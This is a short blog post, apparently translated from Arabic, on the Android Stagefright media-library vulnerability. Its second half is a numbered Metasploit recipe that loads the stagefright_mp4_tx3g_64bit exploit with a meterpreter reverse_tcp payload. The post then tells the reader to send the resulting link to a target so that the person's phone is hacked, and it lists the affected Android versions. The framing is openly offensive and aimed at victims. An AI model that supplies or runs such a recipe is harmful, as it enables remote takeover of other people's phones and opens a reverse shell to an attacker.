استغلال ثغرة stagefright

Exploit a stagefright vulnerability
A serious vulnerability in the Android system in the component StageFright
This is a native media playback library for Android
To record, process and play multimedia files
StageFright component included
In C++ code
Instead of relying on memory-safe Java
This vulnerability has been fixed starting with the version of Android 6
In lower versions, the code pillars were analyzed and many vulnerabilities were discovered that could be exploited using different hacking techniques including methods that don’t even require the target user’s mobile phone number. Like the original hacking method discussed, the hacker had to know the user’s mobile number to run StageFright.  Via MMS, and if he wants to attack a large number of Android phones with this message, he must first collect a large number of phone numbers in a regular or random manner and then spend the money in sending text messages to potential victims
———— ———— ———— ———-
To use this vulnerability through metasploit
Open the tool and type the following commands

1_ use exploit/android/browser/stagefright_mp4_tx3g_64bit

2_ set SRVHOST Payload Hosting Address

3_ URIPATH/

4_ set payload linux/armle/meterpreter/reverse_tcp

5_ set lhost IP

6_ set verbose true

7_ exploit -j

Now the link has been prepared according to the data entered
It is http://*172.19.0.1*:8080
Send it to the device you want to target
As soon as he enters the link, his phone will be hacked

NB
This method works on Android version 2.1
to lollipop version 5.1.1

Categories:

1 Comment

Comments are closed.